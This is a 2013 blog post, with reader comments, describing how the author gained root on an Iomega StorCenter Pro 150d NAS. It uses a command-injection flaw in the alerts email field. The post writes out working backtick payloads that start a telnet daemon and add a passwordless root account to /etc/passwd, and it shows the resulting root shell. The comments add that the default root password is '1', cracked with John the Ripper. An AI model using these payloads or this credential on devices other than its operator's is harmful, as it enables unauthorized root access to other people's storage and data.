Monday, September 2, 2013

Hacking the Iomega StorCenter Pro 150d NAS

The StorCenter Pro 150d is a circa 2007 network-attached storage device (NAS) from Iomega which, frustratingly, does not provide shell access.

I had a problem with AFP (Apple Filing Protocol) not working but managed to get root access to fix it (turned out to be an orphaned pid file which wasn't being removed on boot, and which was preventing the service from starting).

The 150d has a vulnerability in how it handles email addresses within the alerts interface:

Screenshot of the StorCenter Pro 150d's Alerts Interface

You can append any arbitrary command between backticks and it will be dutifully executed as root when you click the "Send Test Mail" button.

It turns out that the StorCenter Pro 150d has a telnet daemon available through inetd. So all we need to do is start that, add a passwordless root account, and we can pop right in.,

Here are the commands that worked for me, but use them at your own risk. Click "Send Test Mail" after entering each one. The null@[] address is arbitrary -- any email address should work there.

UPDATE: See the comment from @George Kopf below. Apparently the default root password is simply the number '1', so you probably don't need to create the additional account. Just start the telnet daemon and try logging in as user 'root' with password '1'.

null@[]`mount -t devpts devpts /dev/pts >> /nethdd/public/hacknas.log 2>&1 &`

null@[]`nohup /bin/inetd /etc/inetd.conf >> /nethdd/public/hacknas.log 2>&1 &`

null@[]`echo 'root2::0:0:administrator:/mnt/0:/bin/sh' >>/etc/passwd`

If you have the /public share of your NAS mounted somewhere, you can watch the hacknas.log file to see any error messages.

Once done, you should be able to telnet in:

$ telnet nas
Connected to
Escape character is '^]'.

Linux 2.6.13 (obi) (pts/0)

nas login: root2

BusyBox v1.00 (BUILDTIME) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

-sh: can't access tty; job control turned off
~ #

System info:

# cat /proc/cpuinfo
processor : 0
cpu : e300
revision : 1.1 (pvr 8083 0011)
bogomips : 263.16
chipset : 8347E
Vendor : Freescale Inc.
Machine : mpc8347E sys
core clock : 396 MHz
bus  clock : 264 MHz
PVR : 0x80830011
SVR : 0x80520011
PLL setting : 0x6
Memory : 256 MB

For reference, here is the Iomega 150d manual.

Thanks to Jim Buzbee for identifying the alert vulnerability, and asysadm for his post on modifying the NFS export options.


Anonymous said...

:-) . Thanks.

Unknown said...

This is brilliant. I used the first two commands to start telnet and then ran cat /etc/passwd >> to the log file

I used John the Ripper to crack the root password and it was a: 1

The root password is the number one.

mla said...

Seriously? Wow, too funny.

Anonymous said...

i confirm ... password is 1 !!!
thanks for this hack, work with firmware 85.85

viewspk said...
This comment has been removed by a blog administrator.